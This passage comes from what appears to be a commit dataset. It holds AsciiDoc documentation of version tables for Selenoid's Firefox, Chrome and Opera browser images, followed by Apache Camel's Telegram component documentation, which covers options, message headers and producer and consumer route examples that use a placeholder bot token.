selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to bug in *Operadriver* to work with *Opera Blink* images you need to pass additional capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. Many of base operations like working with proxies may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n","old_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .30+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 3.2.0 + GD 0.13.0 | 48.0.2 (native events and proxies don't work) \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 3.2.0 + GD 0.13.0 | 49.0.2 (native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 3.2.0 + GD 0.13.0 | 50.0.2 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 3.2.0 + GD 0.14.0 | 51.0.1 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 3.3.1 + GD 0.15.0 | 52.0.2 (native events, switching windows don't work; proxy capability format could change) \n|===\n\nWARNING: Firefox images below require Selenium client 3.4.0 or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.6 | 0.16.0 | 53.0 (switching windows may not work) .4+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.6 | 0.17.0 | 54.0 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.6 | 0.18.0 | 55.0.1 (switching windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.7 | 0.19.0 | 56.0 \n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to bug in *Operadriver* to work with *Opera Blink* images you need to pass additional capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. Many of base operations like working with proxies may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"82128c14ae875b70a9a21392ca82aea758eb86cd","subject":"Regen","message":"Regen\n","repos":"christophd\/camel,mcollovati\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,alvinkwekel\/camel,christophd\/camel,zregvart\/camel,pax95\/camel,christophd\/camel,nikhilvibhav\/camel,CodeSmell\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,alvinkwekel\/camel,cunningt\/camel,mcollovati\/camel,zregvart\/camel,gnodet\/camel,ullgren\/camel,nicolaferraro\/camel,adessaigne\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,DariusX\/camel,apache\/camel,nikhilvibhav\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,ullgren\/camel,DariusX\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,CodeSmell\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,nicolaferraro\/camel,zregvart\/camel,tadayosi\/camel,ullgren\/camel,CodeSmell\/camel,adessaigne\/camel,adessaigne\/camel,pax95\/camel,pmoerenhout\/camel,gnodet\/camel,pmoerenhout\/camel,apache\/camel,DariusX\/camel,cunningt\/camel,ullgren\/camel,zregvart\/camel,tadayosi\/camel,tadayosi\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/telegram-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/telegram-component.adoc","new_contents":"[[telegram-component]]\n= Telegram Component\n:page-source: components\/camel-telegram\/src\/main\/docs\/telegram-component.adoc\n\n*Since Camel 2.18*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe Telegram component provides access to the https:\/\/core.telegram.org\/bots\/api[Telegram Bot API].\nIt allows a Camel-based application to send and receive messages by acting as a Bot, participating in\ndirect conversations with normal users, private and public groups or channels.\n\nA Telegram Bot must be created before using this component, following the instructions at the\nhttps:\/\/core.telegram.org\/bots#3-how-do-i-create-a-bot[Telegram Bot developers home].\nWhen a new Bot is created, the https:\/\/telegram.me\/botfather[BotFather] provides an\n**authorization token** corresponding to the Bot. The authorization token is a mandatory parameter\nfor the camel-telegram endpoint.\n\nNOTE: In order to allow the Bot to receive all messages exchanged within a group or channel (not just\nthe ones starting with a '\/' character), ask the BotFather to *disable the privacy mode*, using the\n*\/setprivacy* command.\n\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-telegram<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,text]\n----------------------------------------------------\ntelegram:type\/authorizationToken[?options]\n----------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\/\/ component options: START\nThe Telegram component supports 7 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *authorizationToken* (security) | The default Telegram authorization token to be used when the information is not provided in the endpoints. | | String\n| *client* (advanced) | To use a custom AsyncHttpClient | | AsyncHttpClient\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. | | AsyncHttpClientConfig\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | https:\/\/api.telegram.org | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\/\/ endpoint options: START\nThe Telegram endpoint is configured using URI syntax:\n\n----\ntelegram:type\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *type* | *Required* The endpoint type. Currently, only the 'bots' type is supported. | | String\n|===\n\n\n=== Query Parameters (31 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *limit* (consumer) | Limit on the number of updates that can be received in a single polling request. | 100 | Integer\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *timeout* (consumer) | Timeout in seconds for long polling. Put 0 for short polling or a bigger number for long polling. Long polling produces shorter response time. | 30 | Integer\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *chatId* (producer) | The identifier of the chat that will receive the produced messages. Chat ids can be first obtained from incoming messages (eg. when a telegram user starts a conversation with a bot, its client sends automatically a '\/start' message containing the chat id). It is an optional parameter, as the chat id can be set dynamically for each outgoing message (using body or headers). | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *bufferSize* (advanced) | The initial in-memory buffer size used when transferring data between Camel and AHC Client. | 4096 | int\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. | | AsyncHttpClientConfig\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *proxyHost* (proxy) | HTTP proxy host which could be used when sending out the message. | | String\n| *proxyPort* (proxy) | HTTP proxy port which could be used when sending out the message. | | Integer\n| *authorizationToken* (security) | *Required* The authorization token for using the bot (ask the BotFather) | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-telegram-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.telegram.authorization-token* | The default Telegram authorization token to be used when the information is not provided in the endpoints. | | String\n| *camel.component.telegram.base-uri* | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *camel.component.telegram.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.telegram.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.telegram.client* | To use a custom AsyncHttpClient. The option is a org.asynchttpclient.AsyncHttpClient type. | | String\n| *camel.component.telegram.client-config* | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. The option is a org.asynchttpclient.AsyncHttpClientConfig type. | | String\n| *camel.component.telegram.enabled* | Whether to enable auto configuration of the telegram component. This is enabled by default. | | Boolean\n| *camel.component.telegram.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"20%,80%\",options=\"header\",]\n|=======================================================================\n|Name |Description\n|`CamelTelegramChatId` |This header is used by the producer endpoint in order to\nresolve the chat id that will receive the message. The recipient chat id can be\nplaced (in order of priority) in message body, in the `CamelTelegramChatId` header\nor in the endpoint configuration (`chatId` option).\nThis header is also present in all incoming messages.\n\n|`CamelTelegramMediaType` |This header is used to identify the media type when\nthe outgoing message is composed of pure binary data. Possible values are strings or enum values\nbelonging to the `org.apache.camel.component.telegram.TelegramMediaType` enumeration.\n\n|`CamelTelegramMediaTitleCaption` |This header is used to provide a caption or title\nfor outgoing binary messages.\n\n|`CamelTelegramParseMode` |This header is used to format text messages using HTML or Markdown (see `org.apache.camel.component.telegram.TelegramParseMode`).\n\n|=======================================================================\n\n== Usage\n\nThe Telegram component supports both consumer and producer endpoints.\nIt can also be used in *reactive chat-bot mode* (to consume, then produce messages).\n\n== Producer Example\n\nThe following is a basic example of how to send a message to a Telegram chat through the\nTelegram Bot API.\n\nin Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"direct:start\").to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"direct:start\"\/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<route>\n---------------------------------------------\n\nThe code `123456789:insertYourAuthorizationTokenHere` is the *authorization token* corresponding to the Bot.\n\nWhen using the producer endpoint without specifying the *chat id* option, the target chat will be identified using information contained in the body or headers of the message.\nThe following message bodies are allowed for a producer endpoint (messages of type `OutgoingXXXMessage` belong to the package `org.apache.camel.component.telegram.model`)\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `OutgoingTextMessage` | To send a text message to a chat\n| `OutgoingPhotoMessage` | To send a photo (JPG, PNG) to a chat\n| `OutgoingAudioMessage` | To send a mp3 audio to a chat\n| `OutgoingVideoMessage` | To send a mp4 video to a chat\n| `OutgoingDocumentMessage` | To send a file to a chat (any media type)\n| `OutgoingStickerMessage` | To send a sticker to a chat (WEBP)\n| `EditMessageTextMessage` | To edit text and game messages (editMessageText)\n| `EditMessageCaptionMessage` | To edit captions of messages (editMessageCaption)\n| `EditMessageMediaMessage` | To edit animation, audio, document, photo, or video messages. (editMessageMedia)\n| `EditMessageReplyMarkupMessage` | To edit only the reply markup of message. (editMessageReplyMarkup)\n| `EditMessageDelete` | To delete a message, including service messages. (deleteMessage)\n| `SendLocationMessage` | To send a location (setSendLocation)\n| `EditMessageLiveLocationMessage` | To send changes to a live location (editMessageLiveLocation)\n| `StopMessageLiveLocationMessage` | To stop updating a live location message sent by the bot or via the bot (for inline bots) before live_period expires (stopMessageLiveLocation)\n| `SendVenueMessage` | To send information about a venue (sendVenue)\n| `byte[]` | To send any media type supported. It requires the `CamelTelegramMediaType` header to be set to the appropriate media type\n| `String` | To send a text message to a chat. It gets converted automatically into a `OutgoingTextMessage`\n\n|===================================================\n\n\n== Consumer Example\n\nThe following is a basic example of how to receive all messages that telegram users are sending to the configured Bot.\nIn Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ProcessorBean.class)\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"myBean\" \/>\n<route>\n\n<bean id=\"myBean\" class=\"com.example.MyBean\"\/>\n---------------------------------------------\n\nThe `MyBean` is a simple bean that will receive the messages\n\n[source,java]\n---------------------------------------------------------\npublic class MyBean {\n\n public void process(String message) {\n \/\/ or Exchange, or org.apache.camel.component.telegram.model.IncomingMessage (or both)\n\n \/\/ do process\n }\n\n}\n---------------------------------------------------------\n\n\nSupported types for incoming messages are\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `IncomingMessage` | The full object representation of an incoming message\n| `String` | The content of the message, for text messages 